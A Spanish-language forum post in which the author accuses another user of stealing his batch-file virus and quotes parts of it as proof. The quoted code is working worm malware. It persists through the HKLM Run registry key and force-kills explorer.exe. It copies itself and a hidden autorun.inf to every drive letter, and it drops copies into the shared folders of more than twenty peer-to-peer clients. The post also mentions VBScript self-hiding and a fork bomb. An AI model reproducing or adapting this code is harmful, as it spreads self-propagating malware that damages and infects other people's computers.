Nadie lo duda, pero sino aportas pruebas yo también puedo decir que lo hice yo.
Aunque viendo el post no me estraña que sea un ripper porque no ha usado etiquetas y se notan ciertas partes de diferente estilo con respecto a la programación y al nivel.
En el código original no era IDEAS.html, era IEAS:
:IEAS
ECHO.
^<H1
^> ~~~HACKED BY [antiguo_nick_mio]~~~
ECHO.
^</HTML
^>)>%HOMEDRIVE%\IEAS.HTML
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v aErx_sys /t REG_SZ /d "%HOMEDRIVE%\IEAS.HTML"
ATTRIB +H %HOMEDRIVE\IEAS.HTML
Esta linea:
tasskill /im explorer.exe /f
>nul 2
>&1
|| taskill explorer
>nul 2
>&1
copiada tal cual de otro virus mío que llamé "BaTr00t_a".
for %%#
in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
) do ( copy /Y "
%homedrive%\autorun.inf" "
%%#:\autorun.inf"
>nul 2
>&1
copy /Y "
%0" "
%%#:\baTr00t_a.bat"
>nul 2
>&1
attrib +R +S +H "
%%#:\autorun.inf"
>nul 2
>&1
attrib +R +S +H "
%%#:\baTr00t_a.bat"
>nul 2
>&1
)
Lo mismo con esta parte, que el ripper no fue muy hábil porque como podeis ver en el código tiene puesto
autoexec_a (conservando el
_a).
Y esta parte:
:p2prop
copy /y "
%0" "
%programfiles%\Morpheus\My Shared Folder\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\ICQ\shared files\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\KaZaA\My Shared Folder\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Shareaza\Downloads\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\EDONKEY2000\incoming\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\eMule\Incoming\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Filetopia3\Files\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\XoloX\Downloads\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Gnucleus\Downloads\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\LimeWire\Shared\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Grokster\My Grokster\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Overnet\incoming\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%appdata%\Ares\My Shared Folder\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Swaptor\Download\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\WinMX\My Shared Folder\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Tesla\Files\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\BearShare\Shared\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Rapigator\Share\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\KaZaA Lite\My Shared Folder\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\KMD\My Shared Folder\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\appleJuice\incoming\
%var%.bat"
>nul 2
>&1
copy /y "
%0" "
%programfiles%\Direct Connect\Received Files\
%var%.bat"
>nul 2
>&1
Ya ni siquiera se molestó en modificarla.
La creación del
autorun.inf lo mismo.
En realidad todo es mío, solo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.
No aporto links para no hacer spam, pero en google podeis encontrarlo.
Pero vamos, que me da igual, que sigan rippeando, así llegarán lejos.
Saludos!